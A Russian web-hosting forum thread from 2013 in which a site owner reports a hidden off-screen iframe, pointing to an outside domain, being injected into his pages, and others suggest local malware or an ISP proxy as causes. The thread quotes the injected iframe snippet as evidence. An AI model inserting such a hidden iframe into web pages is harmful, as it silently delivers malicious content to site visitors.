вирус-неведимка)

SSL, TLS, Web protect, etc.

Модераторы: Art.i, vasya

вирус-неведимка)

Сообщение segajb » Пн янв 28, 2013 12:05 pm

Возникла странная ситуация: есть несколько сайтов под разными пользователями, один из них взломали, и во всех файлах после первого закрывающийся тега </script> появляется такая конструкция
Код: выделить все
<style>.unv6gndx { position:absolute; left:-1031px; top:-1689px} </style> <div class="unv6gndx"><iframe src="http://compressedquickfix.net:443/messages/rail/local/function.php?users=898&themes=39&sport=604&impressum=121&subject=894&bios=274" width="246" height="429"></iframe></div>

Адрес, стиль , класс обычно разный (но сейчас встречаю повторения). Кажется всё просто но:
1. этот код появляется не только на сайте пользователя который взломали, но и на всех сайтах аккаунта, и даже если создать новго пользователя.
2. этот iframe показыватеся лишь раз на одном компьютере. После мучительных экспериментов выяснил, что снова код можно вызвать лишь сменив ip и почистив систему и кеш с помощью программы ccleaner и запустив firefox (windows). Включение-выключение js в браузере ничего не меняет.
3. служба поддержки бессильна: дата изменения файлов не меняется, код чистый, антивирус ничего не находит.
4. вывод: проблема в локальном компьютере? Но нет, во первых первые признаки взлома обнаружил не я, а клиенты. Но это конечно просто слова, поэтому нашёл доказательство: официальный валидатор validator.w3.org
Специально для тестов был сделан файл http://www.top-gear-19.ru/test.php, исходный код его
Код: выделить все
<html>
</script>
</html>

откройте его в валидаторе, укажите Show Source
http://validator.w3.org/check?uri=http%3A%2F%2Fwww.top-gear-19.ru%2Ftest.php&charset=%28detect+automatically%29&doctype=Inline&ss=1&group=0&user-agent=W3C_Validator%2F1.3
Внизу будет исходный код страницы и вы увидите этот iframe....
Аналогично как с этим сайтом так и со всеми другими.

Мне уже даже не столь хочется удалить этот код, как интересна причина, где источник этой дряни.
Спасибо за внимание, буду раз любому совету)
segajb
 
Сообщений: 48
Зарегистрирован: Чт июн 21, 2012 6:18 pm

Re: вирус-неведимка)

Сообщение ls » Пн янв 28, 2013 8:02 pm

_http://www.top-gear-19.ru/test.php - чистый, проблема у вас на компьютере 99%
служба поддержки бессильна: дата изменения файлов не меняется

Раз дата не меняется и если открыв файл в консоли (cat filename.php) изменений в файле нет - то файлы не заражены
откройте его в валидаторе, укажите Show Source

когда вы открываете файл в онлайн валидаторе вы в логах сайта видете обращение? Сдается что это кэш или не с того сервера показывается.
буду раз любому совету)

Попробовать с другого чистого компьютера, на вашем компьютере можно попробовать загрузиться в чистую систему - попробуйте Live DVD с Ubuntu
Еще проверьте .htaccess на сервере в папке сайта и в вышележащих файлах и конфиг apache
* FirstVDS в twitter в facebook и в вконтакте *
ls
Support team
 
Сообщений: 6388
Зарегистрирован: Чт мар 01, 2007 10:36 am
Откуда: FirstVDS

Re: вирус-неведимка)

Сообщение swg » Пн янв 28, 2013 8:33 pm

root@cll:~/0# wget http://www.top-gear-19.ru/test.php
--2013-01-28 21:32:19-- http://www.top-gear-19.ru/test.php
Resolving http://www.top-gear-19.ru (http://www.top-gear-19.ru)... 62.109.26.209
Connecting to http://www.top-gear-19.ru (http://www.top-gear-19.ru)|62.109.26.209|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25 [text/html]
Saving to: `test.php'

100%[=================================================================================================>] 25 --.-K/s in 0s

2013-01-28 21:32:19 (3.68 MB/s) - `test.php' saved [25/25]

root@cll:~/0# cat test.php
<html>
</script>
</html>


Причины
1. Вирус на компе
2. HTTP трафик может скрыто проксироваться провайдером и проблемы у него
swg
флудит форум
 
Сообщений: 2384
Зарегистрирован: Сб окт 07, 2006 9:09 am
Откуда: NNov


Вернуться в Безопасность

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2

cron